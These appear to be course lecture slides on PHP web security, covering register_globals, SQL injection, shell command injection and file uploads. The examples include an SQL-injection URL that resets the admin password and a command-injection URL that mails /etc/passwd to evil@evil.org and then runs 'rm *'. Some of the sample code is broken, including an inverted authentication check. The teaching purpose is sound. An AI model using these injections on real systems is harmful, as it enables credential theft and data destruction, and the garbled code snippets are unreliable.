PHP Security

PHP Security

CS-422

(from The Linux Journal Oct 2002 author: Nuno Lourereio)

Secure Web Applications

• Most security issues have to do with:

– hacker attacks

• denial of service • server hijacking – common threats – compromise of data

Basic Rule

• Never trust user input

– Poorly or unvalidated user input constitutes the

most severe security problem with web applications • can crash a server • can cause buffer overflows

– can allow machine to be hijacked – allow hacker to have root access

– Assume user input is bad until you prove its OK

Global Variable Scope

•

In versions of PHP earlier than 4.2.0 many external variables were defaulted to global scope, variables couldn’t be trusted

if (authenticate_user()) {

$authenticated = true; }

…

if (!$authenticated) {

die (“Authorization required”) }

?>

If you set $authenticated to 1 via a GET:

http://example.com/admin.php?authenticated=1

the last test would pass, when it shouldn’t

Global Variable Scope (more)

Since PHP 4.1.0 register_globals has been deprecated; GET, POST, Cookie, Server, Environment and Session variables are no longer in the global scope.

There are several new arrays to help developers writing applications:

$_GET, $_POST, $COOKIE, $_SERVER, $_ENV, $_REQUEST, $_SESSION

$_SESSION[‘authenticated’] = false;

if (authenticate_user( )) {$_SESSION[‘authenticated’] = true;}

….

If ($_SESSION[‘authenticated’]) { die (“Authorization required”);}

?>

Database Interaction

Most PHP application use data entered from a form to build SQL queries, this can cause a security risk. Assume a script that edits data from some table with a form that POSTs to the same script. The beginning of the script checks to see if the form was submitted then updates the user chosen table.

if ($update_table_submit) {

$db -> query(“update $table set name=$name); >

?>

If you don’t validate variable $table it could be set to any table via a GET

http://examp.com/edit.php? update_table_submit=1&table=users+set+password%3Daaa+where+user %3D%27admin%27%+%23

update users set password=aaa where user=“admin” # set name=$name

Calling External Programs

Sometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input.

Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands.

The user could control $to to yield:

http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A

which would result in running the command:

/usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm *

a solution would be:

$fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);

File Uploads

User uploaded file can be a problem because of the way that PHP handles them. PHP will define a variable in the global scope that has the same name as the file input tag in the submitted web form. Then it will create this file with the uploaded file content but not check if the filename is valid or is the uploaded file.

if ($upload_file && $fn_type = = ‘image/gif’ && $fn_size < 100000) {

copy($fn,’images/’);

unlink($fn); ?>